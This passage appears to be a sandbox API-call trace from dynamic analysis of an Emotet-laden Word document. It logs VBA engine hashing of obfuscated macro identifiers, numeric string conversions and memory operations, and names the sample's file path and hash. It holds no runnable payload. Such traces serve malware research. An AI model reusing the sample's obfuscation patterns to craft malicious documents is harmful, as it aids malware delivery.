lcid=0x409, szName="OQAkACQ") returned 0x1014e0 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aQZGUok1") returned 0x10c248 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NQGQCA") returned 0x1093d6 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sZDwZZwx") returned 0x109778 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="t1AAZ_Ao") returned 0x108362 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oBABoUAQ") returned 0x1082c3 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rcxDADA") returned 0x10529a [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XwAk1D") returned 0x108b97 [0067.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba04f2, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0067.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.893] VarI4FromStr (in: strIn="648142815", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.893] VarI4FromStr (in: strIn="419865521", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.893] VarI4FromStr (in: strIn="223080320", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="133379803", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="934940185", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="614460364", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="17211971", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="849138857", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="212414273", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="542054942", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="356710906", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="941488133", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="684898044", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="393569009", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="450585687", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] CExposedStream::Read () returned 0x0 [0067.894] CExposedStream::Read () returned 0x0 [0067.894] VarI4FromStr (in: strIn="637215556", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="552783140", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="120334299", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="680249055", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="231394800", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="20643445", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.894] VarI4FromStr (in: strIn="768798316", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="51723212", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="4187764", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="641913628", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="557461269", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="506651352", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="259468692", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] strcpy_s (in: _Dst=0x7fee3b5efc0, _DstSize=0x100, _Src="XwAk1D" | out: _Dst="XwAk1D") returned 0x0 [0067.895] IMalloc:Realloc (This=0x7fefec05380, pv=0x64fcbb0, cb=0x400) returned 0xafa6b90 [0067.895] VarI4FromStr (in: strIn="815926256", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="154071288", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="788647145", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="876036821", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="682972006", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="181132492", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="293517082", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="713215225", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="914638293", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="901342427", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.895] VarI4FromStr (in: strIn="941725094", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="402316942", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="385785428", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="217007089", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="389380417", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="741478891", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="969204026", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="271062806", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="731997643", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="280950118", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="868406861", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="984428350", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="970082684", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="510660702", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="17662225", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="288040220", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="111826133", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="659547930", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="893534277", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="147678655", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="698127787", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="700606676", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="617633722", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="975051155", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="940124407", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="633040771", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.896] VarI4FromStr (in: strIn="970371495", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="231085703", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="983663443", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="847706687", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="743384779", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="550171993", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="486858042", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="658784125", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="947763116", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="609731524", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="984328868", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="721833568", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="864986466", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="630302658", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="815014557", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="113981992", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="132890651", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="296368970", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="279469399", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="806216725", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="269394839", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="409062855", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.897] VarI4FromStr (in: strIn="350234886", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="600516000", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="532097151", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="660154447", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="93098624", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="34730825", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="73349052", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="780228605", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="800446451", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="358870149", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="997981548", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="486748947", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="157070329", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="235391699", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="936924221", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="483740562", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="795056402", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="664942423", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="657497714", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="832313988", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="240340494", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="343748995", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="753736128", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="297432379", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="416481490", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.898] VarI4FromStr (in: strIn="720991521", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="914000440", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="850282852", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="303081283", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="371464790", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="399821832", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="591460970", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="754747421", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="827248108", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="286393163", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="272526986", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] VarI4FromStr (in: strIn="859008337", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.899] CExposedStream::Read () returned 0x0 [0067.899] IMalloc:Realloc (This=0x7fefec05380, pv=0xafbe410, cb=0x1a94) returned 0xafbe410 [0067.899] CExposedStream::Release () returned 0x1 [0067.899] CExposedStream::Release () returned 0x0 [0067.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GB_C_A", cchWideChar=7, lpMultiByteStr=0x146450, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GB_C_A", lpUsedDefaultChar=0x0) returned 7 [0067.899] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0067.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GB_C_A", cchWideChar=7, lpMultiByteStr=0x146590, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GB_C_A", lpUsedDefaultChar=0x0) returned 7 [0067.899] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0067.899] IMalloc:Realloc (This=0x7fefec05380, pv=0x258d400, cb=0x18) returned 0x258d2c0 [0067.899] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60c40 [0067.900] IMalloc:GetSize (This=0x7fefec05380, pv=0xaf60c40) returned 0x80 [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf02ed0 [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf02f90 [0067.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GB_C_A", cchWideChar=7, lpMultiByteStr=0x146450, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GB_C_A", lpUsedDefaultChar=0x0) returned 7 [0067.900] CoCreateGuid (in: pguid=0x146180 | out: pguid=0x146180*(Data1=0x8cdedec2, Data2=0x277, Data3=0x4b6e, Data4=([0]=0xad, [1]=0xec, [2]=0xeb, [3]=0xaa, [4]=0x3b, [5]=0x9c, [6]=0xd1, [7]=0xcd))) returned 0x0 [0067.900] CoCreateGuid (in: pguid=0x146190 | out: pguid=0x146190*(Data1=0x97f02f8d, Data2=0x1a04, Data3=0x4fbf, Data4=([0]=0xb8, [1]=0xf5, [2]=0x44, [3]=0x47, [4]=0x8, [5]=0x0, [6]=0x4d, [7]=0x4c))) returned 0x0 [0067.900] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GB_C_A", cchWideChar=7, lpMultiByteStr=0x1461a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GB_C_A", lpUsedDefaultChar=0x0) returned 7 [0067.900] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0067.900] GetLocalTime (in: lpSystemTime=0x146078 | out: lpSystemTime=0x146078*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0x54)) [0067.900] _ultow_s (in: _Value=0x5e95ca91, _Buffer=0xaf2bb6c, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e95ca91") returned 0x0 [0067.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="035e95ca91", cchWideChar=11, lpMultiByteStr=0x146010, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="035e95ca91", lpUsedDefaultChar=0x0) returned 11 [0067.900] strcpy_s (in: _Dst=0x6a16c98, _DstSize=0x7, _Src="GB_C_A" | out: _Dst="GB_C_A") returned 0x0 [0067.900] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a6b820, cb=0x138) returned 0xaf093a0 [0067.900] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0067.900] wcscpy_s (in: _Destination=0xaf2bb80, _SizeInWords=0x7, _Source="GB_C_A" | out: _Destination="GB_C_A") returned 0x0 [0067.900] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0067.900] wcscpy_s (in: _Destination=0xaf2bb90, _SizeInWords=0x7, _Source="GB_C_A" | out: _Destination="GB_C_A") returned 0x0 [0067.900] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e1f0, cb=0x36) returned 0x646e870 [0067.900] IMalloc:Realloc (This=0x7fefec05380, pv=0x258d760, cb=0x12) returned 0x258d400 [0067.900] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0x60) returned 0x694fee0 [0067.900] IMalloc:Free (This=0x7fefec05380, pv=0xaf60a90) [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e1f0 [0067.900] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e1f0, cb=0x8c) returned 0xaf77cd0 [0067.900] IMalloc:Free (This=0x7fefec05380, pv=0x694fee0) [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0x3d0) returned 0xafd2a50 [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e1f0 [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x258d760 [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60a90 [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a59890 [0067.900] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598a0 [0067.900] wcsncpy_s (in: _Destination=0x146160, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.900] CharLowerBuffW (in: 